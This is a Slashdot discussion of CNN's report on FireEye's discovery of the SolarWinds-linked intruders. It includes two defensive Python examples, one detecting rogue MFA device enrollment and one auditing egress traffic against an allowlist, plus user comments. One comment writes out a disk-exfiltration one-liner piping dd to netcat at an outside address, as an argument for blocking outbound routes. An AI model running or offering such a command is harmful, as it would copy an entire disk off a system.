'Unforced Error' in Suspected Russian Data Breach May Have Led to Its Discovery (cnn.com)

CNN reports: US officials and private sector experts investigating the massive data breach that has rocked Washington increasingly believe the attackers were ultimately discovered because they took a more aggressive "calculated risk" that led to a possible "unforced error" as they tried to expand their access within the network they had penetrated months earlier without detection, according to a US official and two sources familiar with the situation... FireEye was tipped off to the hackers' presence when they attempted to move laterally within the firm's network, according to the sources, a move that suggested the hackers were targeting sensitive data beyond email addresses or business records.

Whether that exposure was the result of a mistake by the attackers or because they took a calculated risk remains unclear, the sources said. "At some point, you have to risk some level of exposure when you're going laterally to get after the things that you really want to get. And you're going to take calculated risks as an attacker," one source familiar with the investigation said...

Now, the hackers are attempting to salvage what access they can as the US government and private sector are "burning it all down," sources said, referring to their complete overhaul of networks, which will force the attackers to find new ways of getting the information they seek. Meanwhile, US officials continue to grapple with the fallout and assess just how successful the operation was, the US official said, noting that it is clear the nation-state responsible invested significant time and resources into the effort. While the scope of the hacking campaign remains unclear, government agencies that have disclosed they were impacted have said there is no evidence to date that classified data was compromised. But the way the hackers were discovered suggests the operation was intended to steal sensitive information beyond what was available on unclassified networks and sought to establish long-standing access to various targeted networks, the sources said.

The fact that FireEye — not the federal government — discovered the breach has also raised questions about why the attack went undetected at US government agencies.

The article also notes FireEye's acknowledgement that the breach "occurred when the hackers, who already had an employee's credentials, used those to register their own device to FireEye's multi-factor authentication system so they could receive the employee's unique access codes."
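The device-registration step the article describes, stolen credentials used to enroll an attacker-controlled device so the attacker receives the victim's one-time codes, is an event a defender can alert on from the identity provider's audit log. The following is an added example, not FireEye's or CNN's code: the log format, user names, RFC 5737 addresses and detection rules are constructed for illustration. It flags an enrollment when the source address was never seen on an earlier MFA-verified login, or when the session doing the enrolling was itself authenticated by password alone.

```python
"""Flag MFA device enrollments that look like an attacker registering a device
with stolen credentials. Added example, not FireEye tooling; the audit-log
format and all data below are constructed for illustration."""
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed audit log (not real data). Each line: ISO-8601 timestamp followed
# by key=value pairs. 'mfa=ok' means the login completed a second factor.
SAMPLE_LOG = """
2020-11-02T09:01:12Z user=alice event=login method=password mfa=ok src=198.51.100.20
2020-11-09T08:55:40Z user=alice event=login method=password mfa=ok src=198.51.100.20
2020-11-09T09:10:00Z user=bob event=login method=password mfa=ok src=198.51.100.31
2020-11-12T14:02:03Z user=alice event=login method=password mfa=ok src=198.51.100.20
2020-11-12T14:05:30Z user=alice event=mfa_device_enrolled device=alice-phone-2 src=198.51.100.20
2020-11-16T11:40:11Z user=bob event=login method=password mfa=ok src=192.0.2.77
2020-11-16T11:42:55Z user=bob event=mfa_device_enrolled device=bob-yubikey src=192.0.2.77
2020-11-20T03:12:44Z user=alice event=login method=password mfa=none src=203.0.113.7
2020-11-20T03:13:10Z user=alice event=mfa_device_enrolled device=android-unknown src=203.0.113.7
2020-11-20T03:14:02Z user=alice event=login method=password mfa=ok src=203.0.113.7
""".strip().splitlines()


def parse_line(line):
    """Split 'TIMESTAMP k=v k=v ...' into a dict with a parsed datetime in 'ts'."""
    ts, *pairs = line.split()
    rec = dict(p.split("=", 1) for p in pairs)
    rec["ts"] = datetime.fromisoformat(ts.replace("Z", "+00:00"))
    return rec


def find_suspicious_enrollments(lines, session_window=timedelta(minutes=30)):
    """Return alerts for mfa_device_enrolled events that (a) come from a source
    address never seen on an MFA-verified login older than the current session,
    or (b) happen in a session whose own login did not pass MFA."""
    events = sorted((parse_line(l) for l in lines), key=lambda r: r["ts"])
    verified_logins = defaultdict(list)   # user -> [(ts, src)] of mfa=ok logins
    last_login = {}                       # user -> most recent login record
    alerts = []
    for ev in events:
        user = ev["user"]
        if ev["event"] == "login":
            last_login[user] = ev
            if ev.get("mfa") == "ok":
                verified_logins[user].append((ev["ts"], ev["src"]))
            continue
        if ev["event"] != "mfa_device_enrolled":
            continue
        # Baseline only counts logins strictly older than this session, so the
        # session's own login cannot vouch for the address it came from.
        cutoff = ev["ts"] - session_window
        known = {src for ts, src in verified_logins[user] if ts < cutoff}
        reasons = []
        if ev["src"] not in known:
            reasons.append("source address never seen on a prior MFA-verified login")
        login = last_login.get(user)
        if login is None or login.get("mfa") != "ok":
            reasons.append("enrolling session was authenticated by password only")
        if reasons:
            alerts.append({
                "ts": ev["ts"].isoformat(), "user": user, "device": ev.get("device"),
                "src": ev["src"], "reasons": reasons,
                "severity": "high" if len(reasons) == 2 else "medium",
            })
    return alerts


if __name__ == "__main__":
    for a in find_suspicious_enrollments(SAMPLE_LOG):
        print(a["severity"].upper(), a["ts"], a["user"], a["device"], a["src"])
        for r in a["reasons"]:
            print("   -", r)
```

On the constructed log, alice's own enrollment on 12 November is quiet (known address, MFA-verified session), bob's YubiKey enrollment from a new address is a medium-severity alert worth a quick confirmation with the user, and the 3 a.m. enrollment for alice from an address never seen before, in a password-only session, is the high-severity case that matches the pattern in the article. The chronological pass matters: once the attacker's device is enrolled, their later logins show mfa=ok and would poison any baseline that counted logins after the enrollment.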
  • by kot-begemot-uk ( 6104030 ) on Saturday December 26, 2020 @12:51PM (#60867474) Homepage
    Looks like a well designed system if all the important stuff was behind 2FA.

    Sooner or later after hacking it, the attacker has a choice - to continue waiting for Godot or to try to get at any of the 2FA protected resources. They tried. The system logged it. They failed.

    This is VERY different from the Solar Winds clusterf*ck and I have absolutely no idea why they are mixed up in the same bag of sh*t. The Solar Winds clusterf*ck is about a totally idiotic, incompetent obsession which has engulfed the "security" part of the USA, NATO and their primary contractors over the last few years.

    Single panes of glass and single click and point solutions (like Solar Winds Orion) are the mother of all backdoors. You hack it and it's game over (longer explanation off-site): https://www.fagain.co.uk/node/... [fagain.co.uk]

    IMHO, mixing them deliberately into a "single bag of sh*t" with the FireEye and other hacks is a deliberate attempt for a distraction by the architects of the "Total Information (Security) Awareness" sh*t sandwich which begot us Solar Winds Orion and the hack. Nope, did not work. Try harder and devise a better distraction next time.

    • by shanen ( 462549 ) on Saturday December 26, 2020 @01:45PM (#60867566) Homepage Journal

      Mod parent up (though I wish it were more clearly worded).

      My initial thought on this topic was whether any one individual is liable to catch the blame for exposing the operation. However, on reading this comment, my reaction is modified to something along the lines of "Surely they must have had an internal discussion about whether or not to try it?"

      Been reading a lot of books on such topics. I think the only one that really had legs was Cyber War by Richard Clarke. High level perspective is still relevant after the ink dried. Main point is that China is the only major player with a balanced game of both offense and defense, which is especially important when relative vulnerabilities are considered. I'm not saying that the other books were bad, but there's a fundamental problem in that most cyber-security books are basically historical artifacts by the time the ink has dried. But if you can recommend a good book, then it's quite likely that I'll see if I can round up a copy. (Unless I've already read it, of course.) Just about to start (the peripherally related) Zucked even though I'm already pretty sure we already are.

    • Thanks for the link to the fagain site. His observations about the sequence of package-signing and delivery seem to be spot on. The hack had to be inserted before the signing.
      • The part that baffles me is why these networks with security-related info are on the internet, or have routes out. Why aren't there DMZs that have the updates, and relevant integrations between the various networks? If I manage to execute code on a machine (dd if=/dev/sda | nc 1.2.3.4 1234), that should fail because these networks should not be allowed to talk to everything and anything on the internet. Intranet services, specific links to other networks they work with, and a DMZ that will deliver updates.
        • It is because they are what is called, as a term of art, stupid dumb fucks. They do not know how to do Risk Assessments and have yet more stupid dumb fucks that install "updates" because "updates" without doing any Risk Assessment at all.

          All these stupid dumb fucks should be shown to the Welfare line or sent off as Cannon-fodder for the next shooting-war.

          The sooner they are eliminated the better off the world will be.

        • I suppose you don't know that anyone, including your cat, can get a Cybersecurity degree these days.

          Seriously, check your inbox (the spam folder): no doubt it is filled with offers from (small, accredited) University. The same way MBAs were offered by everyone a decade ago.

    • > a totally idiotic, incompetent obsession

      The obsession isn't idiotic and incompetent, the people behind it are.

      The PHB's want to be able to look at a source of truth they can understand so they aren't reliant on their underlings. It's the Culture of Power at work. Good managers, by contrast, are delighted to have hyper-competent employees and go to bat for them.

      This isn't to say that data fusion isn't useful but that's not what's being marketed to those who hold the budgets.

    • by jkroll ( 32063 )

      This is VERY different from the Solar Winds

      Actually it is not, FireEye is a Solar Winds customer and they are the ones that discovered the malware that was implanted in the Solar Winds Orion product when investigating this breach.

      It turns out that Solar Winds was compromised and the malware implanted in the Orion product back in 2019. So all the customers using Orion product were vulnerable to a supply chain attack when they installed subsequent patches from Solar Winds.

      What would be interesting to know is how Solar Winds missed the trojaned DLL in

      • by jkroll ( 32063 )

        Adding link to some of the analysis on the Solar Winds issue from Rapid7 [slashdot.org] that I forgot to include in the original response.

    • This is VERY different from the Solar Winds clusterf*ck and I have absolutely no idea why they are mixed up in the same bag of sh*t.

      You need to read the article, because you're just winging it.

      This is about how FireEye detected intruders on their network, which led to the discovery of the Solar Winds infiltration and hacked updates. If you have no idea how they're related, then you're being willfully ignorant, or dumb?

      The hackers got in with the hacked Solar Winds update, stole some employee creds, and they were discovered while attempting to register their own device with the MFA system. You are making it seem like the MFA auth itsel

  • by cats-paw ( 34890 ) on Saturday December 26, 2020 @02:12PM (#60867620) Homepage

    This is a really bad time to have a government full of Trumpian apparatchiks.

    Their go-to reaction is going to be to lie about how bad it is.

  • when you're going laterally to get after the things that you really want to get.

    that sounds as if the stuff that the hackers did get (despite press reports about the severity of the leak) wasn't really very important.
    Either that, or they had tapped that source dry and had little to lose by going after more sensitive / better protected material.

    However, if that "better" material was also better protected - as the story suggests - then it does sound as if those higher levels of protection did actually do what they were supposed to.

    News about security breaches is always exaggerated.

  • When the Iranian counter intelligence rolled up CIA's entire penetration into their networks and also caught a few live spies who were doing the physical job of loading usbs. Seems like this foreign network is getting rolled up. We may even catch a few of their spies. Time for a spy exchange.
  • I post a sentence with three dots and get dinged because it "looks like ASCII art"

    ASCII art however is apparently perfectly fine and is posted no problem at all. We know it wasn't Slashdot's programmers that did the hack.

  • The fact that FireEye — not the federal government — discovered the breach has also raised questions about why the attack went undetected at US government agencies.

    Lack of people to notice the problem? Lack of people who give a shit, knowing that their job or agency is on the White House's hit list? I think Trump has had some success at emptying govt agencies. One of the things he campaigned on.

  • Read the excellent recent Bruce Schneier article in The Guardian (https://www.theguardian.com/commentisfree/2020/dec/23/cyber-attack-us-security-protocols)

    He can't stress enough why focusing on offensive measures and strategies at the expense of defensive ones will certainly lead to disaster.

  • Boomer here skeptical of all the drumming into our heads “nation-state”!

    Vietnam body counts were also drummed into our tiny little brains. Thank you USA. Show your work like the US education system makes you do. Otherwise move-on. You got hacked.

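One comment above asks why a management network with security-relevant data has routes out at all, and sketches the alternative: intranet services, specific links to partner networks, and a DMZ that delivers updates, with everything else (including a raw dd-over-netcat dump to an arbitrary internet address) unable to leave. The following is an added example, not code from the page, from FireEye or from SolarWinds: it applies a hypothetical default-deny egress allowlist to constructed flow records and tags the denied, high-volume flow as an exfiltration candidate. The network ranges, ports and flow lines are all assumptions made for illustration.

```python
"""Default-deny egress policy check over constructed flow records. Added example;
the intranet range, allowlist and flow lines are hypothetical."""
import ipaddress

# Hypothetical internal management network whose hosts should not reach the
# internet directly.
INTRANET = ipaddress.ip_network("10.10.0.0/16")

# Hypothetical egress allowlist: (destination prefix, permitted ports, purpose).
# Anything not matched here is denied.
EGRESS_ALLOW = [
    (ipaddress.ip_network("172.16.5.0/24"), {443}, "update DMZ mirror"),
    (ipaddress.ip_network("10.20.0.0/16"), {443, 8443}, "partner integration link"),
]

# Constructed flow records (not real telemetry). The 1.2.3.4:1234 flow is the
# 'dd if=/dev/sda | nc' scenario from the comment.
SAMPLE_FLOWS = """
ts=2020-12-01T10:00:01Z src=10.10.1.15 dst=10.10.7.9 dport=445 proto=tcp bytes_out=20480
ts=2020-12-01T10:05:12Z src=10.10.1.15 dst=172.16.5.4 dport=443 proto=tcp bytes_out=4096
ts=2020-12-01T10:06:30Z src=10.10.1.15 dst=10.20.3.8 dport=8443 proto=tcp bytes_out=9000
ts=2020-12-01T10:07:02Z src=10.10.1.15 dst=172.16.5.4 dport=22 proto=tcp bytes_out=1200
ts=2020-12-01T10:09:45Z src=10.10.1.15 dst=1.2.3.4 dport=1234 proto=tcp bytes_out=512000000000
ts=2020-12-01T10:11:00Z src=10.10.1.22 dst=8.8.8.8 dport=53 proto=udp bytes_out=180
""".strip().splitlines()


def parse_flow(line):
    """Parse one 'k=v k=v ...' flow line; addresses, port and byte count are typed."""
    rec = dict(p.split("=", 1) for p in line.split())
    rec["src"] = ipaddress.ip_address(rec["src"])
    rec["dst"] = ipaddress.ip_address(rec["dst"])
    rec["dport"] = int(rec["dport"])
    rec["bytes_out"] = int(rec["bytes_out"])
    return rec


def evaluate(flow):
    """Return (verdict, reason) for one flow. Intranet traffic is out of scope of
    the egress policy; everything else must match an allow rule on both
    destination prefix and port, otherwise it is denied."""
    if flow["dst"] in INTRANET:
        return "allow", "intranet"
    for net, ports, purpose in EGRESS_ALLOW:
        if flow["dst"] in net:
            if flow["dport"] in ports:
                return "allow", purpose
            return "deny", f"{purpose}: port {flow['dport']} not permitted"
    return "deny", "destination not on egress allowlist"


def audit(lines, exfil_threshold=100 * 1024 * 1024):
    """Apply the policy to every flow and return the denied ones; a denied flow
    that pushed more than exfil_threshold bytes out is tagged as an exfiltration
    candidate, which is what a disk image piped to netcat would look like."""
    findings = []
    for rec in map(parse_flow, lines):
        verdict, reason = evaluate(rec)
        if verdict == "deny":
            findings.append({
                "ts": rec["ts"], "src": str(rec["src"]), "dst": str(rec["dst"]),
                "dport": rec["dport"], "reason": reason,
                "exfil_candidate": rec["bytes_out"] >= exfil_threshold,
            })
    return findings


if __name__ == "__main__":
    for f in audit(SAMPLE_FLOWS):
        tag = " EXFIL-CANDIDATE" if f["exfil_candidate"] else ""
        print(f"DENY {f['ts']} {f['src']} -> {f['dst']}:{f['dport']} ({f['reason']}){tag}")
```

The same allowlist is what the actual egress firewall for such a network would enforce as a default-deny rule set; running it over flow logs as above is the check that the enforcement point really is default-deny. Note that the SSH attempt to the update DMZ host is denied as well: the DMZ is reachable only on the port the update service uses, so a compromised host cannot use it as a stepping stone.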